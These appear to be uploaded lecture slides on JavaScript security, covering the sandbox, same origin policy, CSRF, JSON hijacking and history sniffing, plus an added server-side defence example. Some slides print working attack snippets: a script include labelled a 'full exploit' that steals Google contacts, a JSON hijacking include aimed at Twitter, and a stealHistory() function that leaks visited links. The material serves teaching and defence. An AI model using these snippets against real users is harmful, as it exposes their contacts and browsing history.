Security - Introduction to Java Script - Lecture Slides, Slides of Javascript programming

Here is my collection on JavaScript lectures. It includes tutorials as well as general concepts explanations. Particularly these slides contain: Security, Javascript Sandbox, Malicious Web, Same Origin Policy, Javascript Global Object, Protecting Javascript, Cross-Site Scripting, Myspace, Cross-Site Request Forgery, Dns Attacks, Escape Output

Typology: Slides

2013/2014

Uploaded on 01/29/2014

surii

JavaScript Security

Living in a powder keg and giving off sparks

  • JavaScript security is a mess
  • The security model is outdated
  • Key examples
  • Attacking DNS to attack JavaScript
  • What are we going to do?

The JavaScript Sandbox

  • JavaScript security dates to 1995
  • Two key concerns:
    • Stop a malicious web site from attacking your computer
    • Stop a malicious web site from interacting with another web site

The Death of the PC

  • If all your documents are in the cloud, what good is protecting your PC?
  • The JavaScript sandbox does nothing to prevent cloud attacks
  • Who cares if a web site is prevented from reading your “My Documents”: it’s empty

The Same Origin Policy

  • Scripts running on one page can’t interact with other pages
  • For example, scripts loaded by jgc.org can’t access virusbtn.com
  • But the Same Origin Policy doesn’t apply to the scripts themselves

  • Remote

<SCRIPT SRC="http://jgc.org/foo.js">

Multiple

JavaScript Global Object

  • JavaScript is inherently a ‘global’ language
  • Variables have global scope
  • Functions have global scope
  • Objects inherit from a global object

Bad stuff you can do globally

  • Different scripts can mess with each other’s variables
  • Different scripts can redefine each other’s functions
  • Scripts can override native methods
  • Transmit data anywhere
  • Watch keystrokes
  • Steal cookies
  • All scripts run with equal authority

JavaScript is everywhere


Script Escalation

  • Scripts can load other scripts
  • Get a foothold and you can do anything

Cross-Site Request Forgery

  • Hijack cookies to use a session for bad purposes
  • Enhance with JavaScript for complex transactions.

CSRF Example: Google Mail

  • Steal authenticated user’s contact

http://docs.google.com/data/contacts?out=js&show=ALL&psort=Affinity&callback=google&max=9

google ({ Success: true, Errors: [], Body: {…

CSRF Example: Google Mail

  • Full exploit

<script type="text/javascript" src="http://docs.google.com/data/contacts?out=js&show=ALL&psort=Affinity&callback=google&max=99999">

JSON Hijacking

  • CSRF attack against JSON objects
  • Works by redefining the Object constructor in JavaScript

<script defer="defer" src=https://twitter.com/statuses/friends_timeline/>
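
Added example (not part of the original slides): one way a server can handle a per-user JSON endpoint so that the cross-site script includes shown in the CSRF and JSON Hijacking slides get nothing readable. The handler name, the session store, the request shape and the X-CSRF-Token header are assumptions made for illustration.

```javascript
// Added example, not from the slides. All names are hypothetical.
const JSON_PREFIX = ")]}',\n"; // turns the body into a syntax error if run as script

// Constructed session store: session id -> { user, csrfToken }
const sessions = new Map([["sid-123", { user: "alice", csrfToken: "tok-9f2c" }]]);

// Comparison that does not stop at the first differing character.
function safeEqual(a, b) {
  if (a.length !== b.length) return false;
  let diff = 0;
  for (let i = 0; i < a.length; i++) diff |= a.charCodeAt(i) ^ b.charCodeAt(i);
  return diff === 0;
}

// req: { query, cookies, headers } with lower-cased header names (assumed shape).
function handleContactsRequest(req) {
  const session = sessions.get(req.cookies.sid);
  if (!session) return { status: 401, body: "" };

  // 1. Never wrap per-user data in a caller-chosen callback (JSONP).
  if ("callback" in req.query) return { status: 400, body: "" };

  // 2. A cookie alone is not proof of intent: the browser also attaches it to
  //    <script src> requests. Require a header that a script tag cannot set.
  const token = String(req.headers["x-csrf-token"] || "");
  if (!safeEqual(token, session.csrfToken)) return { status: 403, body: "" };

  // 3. Serve as JSON, not script, with a prefix that breaks script execution.
  const data = { Success: true, Errors: [], Body: { owner: session.user } };
  return {
    status: 200,
    headers: {
      "Content-Type": "application/json; charset=utf-8",
      "X-Content-Type-Options": "nosniff",
    },
    body: JSON_PREFIX + JSON.stringify(data),
  };
}

// Legitimate same-origin client: strip the prefix before parsing.
function parsePrefixedJson(body) {
  if (!body.startsWith(JSON_PREFIX)) throw new Error("missing JSON prefix");
  return JSON.parse(body.slice(JSON_PREFIX.length));
}
```

Each check covers a different part of the problem: the callback rejection removes the JSONP wrapper, the header check rejects requests that carry only the cookie, and the prefix stops the response from executing even if it is included as a script.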

Stealing history with JavaScript and CSS

  • Use JavaScript to look at the ‘visited’ color of links

function stealHistory() {
  for (var i = 0; i < websites.length; i++) {
    var link = document.createElement("a");
    link.id = "id" + i;
    link.href = websites[i];
    link.innerHTML = websites[i];
    document.body.appendChild(link);
    var color = document.defaultView.getComputedStyle(link, null).getPropertyValue("color");
    document.body.removeChild(link);
    if (color == "rgb(0, 0, 255)") {
      document.write('' + websites[i] + '');
    }
  }
}

Sandbox Holes

  • Sandbox not immune to actual security holes
  • Most recent was Google V8 JavaScript engine
    • Google Chrome V8 JavaScript Engine Remote Code Execution Vulnerability (Bugtraq: 36149)